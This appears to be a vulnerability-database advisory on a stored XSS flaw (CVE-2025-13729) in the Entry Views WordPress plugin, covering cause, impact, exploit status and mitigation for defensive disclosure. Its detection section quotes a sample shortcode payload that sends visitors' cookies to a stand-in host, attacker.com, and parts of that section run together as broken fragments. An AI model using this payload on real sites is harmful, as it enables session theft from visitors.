
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-13729 is a Stored Cross-Site Scripting (XSS) vulnerability in the Entry Views plugin for WordPress, affecting all versions up to and including 1.0.0. The flaw exists in the plugin's entry-views shortcode due to insufficient input sanitization and output escaping on user-supplied attributes. It was published on January 9, 2026, and assigned a CVSS v3.1 base score of 6.4 (Medium) by Wordfence (Wordfence, Feedly).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The root cause lies in the plugin's shortcode handler (shortcodes.php, lines 25 and 36) and template rendering (template.php, line 35), which fail to properly sanitize or escape user-supplied shortcode attributes before outputting them to the page. An authenticated attacker with at least contributor-level access can embed a malicious [entry-views] shortcode containing arbitrary JavaScript into a post or page; the script executes in the browser of any user who subsequently visits that page (Wordfence, WordPress Trac).
Successful exploitation allows an authenticated contributor (or higher-privileged user) to persistently inject malicious JavaScript into WordPress pages, which executes in the context of any visitor's browser. This can lead to session cookie theft, credential harvesting, defacement, or redirection of site visitors to malicious external sites. Because the injected script persists in stored content, all users accessing the affected page are impacted until the payload is removed (Wordfence, Feedly).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-13729. The EPSS score is approximately 0.03%, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access at the contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence, Feedly).
[entry-views] shortcode with a crafted attribute containing a JavaScript payload, for example: [entry-views attribute="\"><script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].[entry-views] shortcodes with unexpected HTML tags (e.g., <script>, <img onerror=, javascript:) embedded in shortcode attributes.wp-admin/post.php or the REST API from contributor-level accounts inserting shortcode content with encoded script tags.[entry-views] shortcode.As of the disclosure date (January 9, 2026), no patched version of the Entry Views plugin has been released — the vulnerability affects all versions up to and including 1.0.0 (Wordfence). Site administrators should immediately deactivate and remove the Entry Views plugin until a patched version is available. As a compensating control, restrict contributor-level post creation or use a Web Application Firewall (WAF) rule to block shortcode-based XSS payloads. Monitor WordPress user accounts for unauthorized contributor registrations.
Wordfence disclosed the vulnerability and included it in their weekly WordPress vulnerability report for January 5–11, 2026 (Wordfence Blog). The vulnerability received limited broader media attention given its medium severity and requirement for authenticated access. A brief mention appeared on Bluesky via automated CVE tracking accounts, and aggregator sites such as VulDB and Patchstack indexed the advisory shortly after publication.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."